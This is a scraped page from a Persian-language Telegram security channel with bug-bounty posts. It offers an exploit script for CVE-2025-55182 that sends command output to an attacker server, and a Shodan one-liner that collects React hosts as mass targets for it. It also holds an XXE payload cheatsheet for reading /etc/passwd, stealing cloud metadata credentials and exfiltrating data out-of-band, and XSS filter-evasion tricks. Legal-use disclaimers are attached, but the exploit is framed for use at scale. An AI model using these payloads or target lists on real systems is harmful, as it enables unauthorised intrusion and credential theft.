RadvanSec – Telegram
RadvanSec
988 subscribers
180 photos
27 videos
141 files
593 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
40 Methods for Privilege Escalation Linux-Windows-macOS.pdf
84.9 MB
40 Methods Of Privilege Escalation of Linux, Windows and Mac

۴۰ روش افزایش سطح دسترسی در لینوکس، ویندوز و مک

⭐️ @RadvanSec
6👍2
بچه هایی که باگ بانتی کار میکنید رفلکشن روی js فایل ها براتون اهمیت داره یا خیلی ساده ازش رد میشید؟!

بگین یه tip کلاینت ساید بهتون بگم
Anonymous Poll
36%
اهمیتی نداره برام چون کانتنت صفحه html نیست
64%
اهمیت داره و سعی میکنم اکسپلویت کنم
3🔥1
🔥7
‌ ‌reza
Voice message
چند نفر از بچه ها گفته بودن چرا کاری که همه انجام میدن رو ماهم باید انجام بدیم عملا این طرز فکر که شما کاری رو انجام بدی که بقیه حتی به فکرشون هم خطور نمیکنه کاملا ایده ی نیچ ای هست و بسیار عالیه و سر این اصلا بحثی نداریم👌

ولی این دلیل نمیشه ما یک کار ثابت که خیلیا شاید ازش نتیجه میگیرن رو نادید بگیریم و انجام ندیم مثلا الان CVE جدیدی که اومده اگر بدونید روی تارگت هایی که دارین ران کنید صد تا هانتر دیگه هم انجام میدن و احتمال داره duplicate بشه گزارشتون, بازم شما باید اون کارو انجام بدید حدااقلش اینه یک کار مثبت انجام دادید و شاید راه های بهتری براتون باز شد.

و در کل از چیزی نترسید اگر چیزی رو خدا روزیتون قرار بده نصیبتون میشه و کسی نمیتونه جلوشو بگیره و اینکه سعی کنید هر روز رشد کنید حتی اندک 🌹🙏
8👏1👌1
react-cve-03.py
2.6 KB
به دلیل اشتباهات زیادی که در اکسپلویت مربوط به CVE-2025-55182
یه کد پایتون ساده مولتی ترد اماده کردم که به راحتی خروجی whoami رو میفرسته به سرور مهاجم

فقط هم این سه تا کتابخونه ایمورت شده که دوتاش برا درخواست و عدم نشون دادن خطاست (ریکویست و یو ار ال لیب) و ترد برا سرعت بالا
ادرس دی ان اس تون رو بدید (برپ کولب یا وب هوک دی ان اس هم اوکیه)
لیست تارگت ها

خروجی whoami میاد برا دی ان اگه اسیب پذیر باشه
درصد جواب دهی ؟ 100% تست شده روی بیش از n ادرس ازمایشگاهی (لابراتوار بوده : D )
تمامی این کد صرفا جهت موارد اموزشی و هکر قانون مند نوشته شده و انجام هرگونه عملیات مخرب روی ادرس هایی که مجوز ندارید خلاف قوانین و نیت این ابزار هست
نکته :‌ترکیبش کنید با api shodan ببینید چی میده
5
Shodan cli command 😁️
shodan search --fields ip_str,port --limit 1000 'http.component:"react"' | awk '{print "https://"$1":"$2}' > test.txt

باز هم برای مصارف اموزشی این رو فقط رو ای پی هایی که اجازه دارید بزنید
قانون مند باشید
5
این پست توضیحات اسیب پذیری ترسناک و جدیدی هست که روی React o nextjs یا دقیق تر بگم RSC اومده، و منجر به دسترسی به سرور میشه و خلاصه مهاجم میتونه بیاد تو(و همه چیز از تو اومدن شروع میشه)😁:

https://www.instagram.com/reel/DR37lC-jSZs/?igsh=MWg4MWplN2o0bXhrNw==


خیلی دوست دارم اون روزی بیاد که پستا تخصصی بیشتر محتوا زرد و طنز دیده بشه 😁❤️‍🔥
6
ActiveScan++ now detects React2Shell: link
Nuclei Template: link
6👍2
XXE Cheatsheet

using external entities:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>



perform SSRF attacks:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>



Blind XXE with out-of-band interaction:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://burp-collab"> ]>



Blind XXE with out-of-band interaction via XML parameter entities:

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://burp-collaborator> %xxe; ]>



blind XXE to exfiltrate data using a malicious external DTD:
DTD file:

<!ENTITY % eval "<!ENTITY &#x25; test SYSTEM 'http://burp-collaborator/?a=%file;'>">
%eval;
%test;XXE Payload:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>



blind XXE to retrieve data via error messages:
DTD file:

<!ENTITY % notvalid "<!ENTITY &#x25; test SYSTEM 'file:///invalid/%file;'>">
%notvalid;
%test;XXE Payload:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>



XInclude to retrieve files:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>



XXE via image file upload:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><noscript width="128px" height="128px" xmlns="http://www.w3.org/2000/noscript" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></noscript>



XXE inside SOAP body:

<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>



XXE: Base64 Encoded:
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>



XXE inside SVG:

<noscript xmlns="http://www.w3.org/2000/noscript" xmlns:xlink
<image xlink:href="expect://ls"></image>
</noscript>



⭐️ @RadvanSec
4👍2
سلام دوستان عزیز،
اگر در هر شاخه‌ای از حوزه امنیت، هک قانونی یا مباحث مرتبط فعالیت دارید و به تدریس و تولید محتوا آموزشی علاقمند هستید، خوشحال می ‌شوم رزومه و نمونه ‌کارهای خود را برای بررسی ارسال کنید.

Telegram: @nexovir
Email: r.mhmmdzde@gmail.com

با احترام و آرزوی موفقیت

⭐️ @RadvanSec
5🤔1👌1
😂😂😂😂

⭐️ @RadvanSec
🤣10😁1
اگر باگ بانتی کار میکنید در زمینه fuzzing این چندتا کار رو کنید نتیجه خوبی میگیرید

1 - برای dns bruteforce ابتدا کل subdomain های سازمان رو استخراج کنید چه in_scope باشند چه نباشند و تمام جایگشت های مختلف رو با ابزار های موجود بسازید (میتونید با ورد لیست های دیگه هم ترکیب کنید) یک ورد لیست خیلی خوبی دارید که برای dnsbrute میتونید استفاده کنید

2 - برای directory fuzzing هم میتونید ابتدا با noscript های اماده یک crawl کامل انجام بدید بر روی کل دارایی های سازمان. سپس یک ورد لیست از directory های موجود دارید برای فاز های بعدی از این ورد لیست استفاده کنید چون بیشتر دایرکتوری ها دائم تکرار میشوند.

3 - برای پارامتر هم میتونید کل پارامتر های موجود در تمام صفحات استخراج کنید این هم میتونه یک ورد لیست خوب و کامل باشه برای پیدا کردن

hidden parameters || hidden files


⭐️ @RadvanSec
🔥5👍2
1. Null-Byte injection

example%00safe



2. Split-Tag / Broken-Keyword


<scri" + "pt>

<sc"+"ript>



3. HTML Entity Obfuscation


&l;t;scr&amp;ipt&gt;



4. Unicode Confusion

scrᵢpt



5. Unexpected Encodings

%73%63%72%69%70%74 



6. Comment Injection

sc<!-- safe -->ript


⭐️ @RadvanSec
11